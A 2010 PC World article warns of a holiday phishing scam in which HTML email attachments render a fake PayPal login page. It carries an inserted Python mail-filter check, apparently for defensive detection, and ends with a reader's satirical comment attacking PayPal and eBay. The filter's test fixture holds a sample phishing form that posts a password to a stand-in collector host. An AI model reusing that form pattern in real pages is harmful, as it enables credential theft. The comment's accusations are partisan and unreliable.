PayPal users beware of holiday phishing scam

The holiday shopping season means more people making more online purchases -- a prime opportunity for phishing scams
PC World (US online), 17 November, 2010 07:27

With Black Friday quickly approaching, and retailers racing to outdo each other with earlier and earlier deals, it is safe to say that the holiday shopping season has begun. If you're shopping online, though, and paying with PayPal -- be warned. There is a phishing attack targeted just for you.

The holidays come with a dramatic spike in shopping, and nobody appreciates the increase in online commerce more than cyber criminals. While you're preparing for a Thanksgiving celebration of beer and watching the Detroit Lions make a mockery of professional football...Hey, don't judge. You try supporting a team that has been consistently sad for 60 years and see if you aren't a little bitter. Fine. While you're preparing for a traditional Thanksgiving feast and plotting your Black Friday shopping strategy, malware developers are hard at work finding ways to capitalize on the shopping season.

PayPal is established as a leading method of online payments. It is an integral part of eBay purchasing -- a very popular way to acquire gifts during the holiday season, and it is widely accepted as a method of payment by online retailers of all sorts. It makes sense that cyber criminals would try to capitalize on the spike in PayPal transactions to catch naïve or unsuspecting users off guard.

AppRiver's Troy Gill has uncovered just such a scam. "Since so many people use PayPal in conjunction with the impending holiday shopping spree, scammers are looking to take full advantage of unwary consumers. The latest PayPal-related scam targets PayPal users via email. Unlike most of the PayPal scams that we have seen in the past that included a link in the body of the message, these have an attached HTML. When the attachment is clicked, a JavaScript will produce a phishing page that mimics a legitimate PayPal page. The input information is then sent off to another domain that will make it available for the cybercriminals."

As Gill notes, this attack attempts to dupe victims by using an attachment as opposed to a link. Granted, users should be conditioned to avoid both links and file attachments in suspicious or questionable e-mails, but just switching things up from the normal malicious URL might be enough to snare some unwary users.
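A mail-filter check for the pattern described above, as an added example (not from the article or from AppRiver): it flags attached HTML files that mention the brand, ask for a password and post the form to a host outside the brand's domain. The `paypal.com` allow-list, the function names and the sample message are assumptions constructed for illustration, and the check assumes the form markup is present in the file in plain or percent-encoded form.

```python
import re
from email import message_from_string
from email.message import EmailMessage
from urllib.parse import unquote, urlparse

BRAND = "paypal"
BRAND_HOSTS = ("paypal.com",)  # assumption: hosts the brand legitimately posts to
FORM_ACTION = re.compile(r"<form\b[^>]*?\baction\s*=\s*[\"']?([^\"'\s>]+)", re.I)
PASSWORD_INPUT = re.compile(r"<input\b[^>]*?\btype\s*=\s*[\"']?password", re.I)

# Constructed test fixture (not a captured sample); .example hosts are reserved.
SAMPLE_HTML = """<html><body><script>
document.write(unescape('%3Cform action="http://collector.example/save" method="post"%3E'));
</script><p>PayPal account check</p>
<input type="password" name="p"></form></body></html>"""

def is_brand_host(host):  # true only for the brand domain or a subdomain of it
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in BRAND_HOSTS)

def audit_html(html):
    """Inspect markup, including markup a script would write after unescape()."""
    text = unquote(html)  # reveal percent-encoded tags hidden in script strings
    hosts = [urlparse(a).hostname for a in FORM_ACTION.findall(text)]
    return {
        "mentions_brand": BRAND in text.lower(),
        "asks_password": bool(PASSWORD_INPUT.search(text)),
        "post_to": sorted({h for h in hosts if h and not is_brand_host(h)}),
    }

def audit_message(raw):
    """Return findings for attached HTML files in a raw RFC 5322 message."""
    findings = []
    for part in message_from_string(raw).walk():
        if part.get_content_type() != "text/html" or not part.get_filename():
            continue  # skip the body and non-HTML parts; only attached HTML
        result = audit_html(part.get_payload(decode=True).decode("utf-8", "replace"))
        if result["mentions_brand"] and result["asks_password"] and result["post_to"]:
            findings.append({"file": part.get_filename(), **result})
    return findings

def sample_message(html=SAMPLE_HTML):  # constructed message with html attached
    msg = EmailMessage()
    msg.set_content("See attached form.")
    msg.add_attachment(html, subtype="html", filename="form.html")
    return msg.as_string()

if __name__ == "__main__":
    print(audit_message(sample_message()))
```

A form built by heavier script obfuscation will not appear in the decoded text, so such attachments still need rendering in a sandbox or a block-by-type policy for HTML attachments.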

Once the attackers have the PayPal credentials entered on the spoofed PayPal page, they can transfer the funds out of the PayPal account, make purchases using the money in the PayPal account, request funds to be sent to the PayPal account, or anything else the legitimate account holder is normally able to do with a PayPal account.

Most avid PayPal customers hopefully know better than to fall for such a thing, but with the holidays and the spike in online shopping comes a deluge of newbies who know enough to use PayPal to make purchases, but aren't seasoned in how to protect it.

Gill warns, "During the next few months you should be aware that you will be a broader target for scammers looking to take advantage of your increased purchasing activity. Since most people will be making a far greater number of purchases on their credit cards around the holidays they would be less likely to notice fraudulent activity on their cards."

Just remember the mantra that common sense and cautious skepticism will prevent almost all attacks. Happy Holidays!


Tony Bradley

Topics: online security, spam, antispam, security, viruses, shopping, paypal, phishing

Comments

Philip Cohen


Draft Media Release re PayPal

“It is with great sadness that eBay’s Chief Headless Turkey, John Donahoe, announces the probable demise of eBay’s most ugly daughter, PayPal. Donahoe says that PayPal is likely to be stricken by particularly virulent strains of Visa+CyberSource and Mastercard Open Platform, and these afflictions are greatly aggravated by PayPal’s insurmountable lack of direct financial institutions support and a great deal of PayPal merchant dissatisfaction, particularly with respect to PayPal’s grossly unfair, “all responsibility avoiding” user agreement, primitive risk management processes, and grossly unprofessional, buyer-biased and fraud-facilitating (indeed, apparently non-existent) transactions mediation, to name just a few of the problems that PayPal merchants have to endure.

“Donahoe says that PayPal’s health may therefore be expected to deteriorate and, if ultimately not completely incapacitated, will most likely be eventually confined to its mandatory offering on what little there will be, by then, left of the Donahoe-devastated eBay marketplaces. There is no cure for this condition, and the “eBafia Don” is particularly saddened by the inevitable presumption that it is unlikely that PayPal will be able to continue to underpin eBay’s sagging bottom line too far into the future.”

Yes, it’s a send-up but, still, it accurately describes PayPal’s most unprofessional and “clunky” operation. The fact is, had the developers of the original “bankcard” concept ever behaved the way PayPal behaves towards its payees in particular, credit/debit cards may never have gotten off the ground, and we would probably still be paying for all our purchases with bits of paper and little metal discs.

It should also be emphasized that all the payments processors that do not have the direct underlying risk-managing and real transaction mediation support of the financial institutions that are ultimately involved in the transaction, as does the likes of Visa/Mastercard, suffer the same handicaps that PayPal suffers. The “banks” may be disliked by some but they at least supply a “professional” payments processing service.

Any off-eBay merchant thinking of voluntarily offering PayPal would be wise to first peruse the very many PayPal merchant horror stories that abound on the internet. A detailed examination of and prognosis for PayPal, (including a link to the “PayPal Horror Tour”) at:
http://forums.auctionbytes.com/vbulletin/showthread.php?t=23309

Shill Bidding on eBay: Case Study #4
This latest study provides an indication of eBay’s desperation to mitigate lessening sales activity and very effectively demonstrates eBay’s effective aiding and abetting of criminal shill bidding “wire fraud” activity by unscrupulous professional sellers on unsuspecting buyers:
http://forums.auctionbytes.com/vbulletin/showthread.php?t=23540

eBay/PayPal/Donahoe: Dead Men Walking.
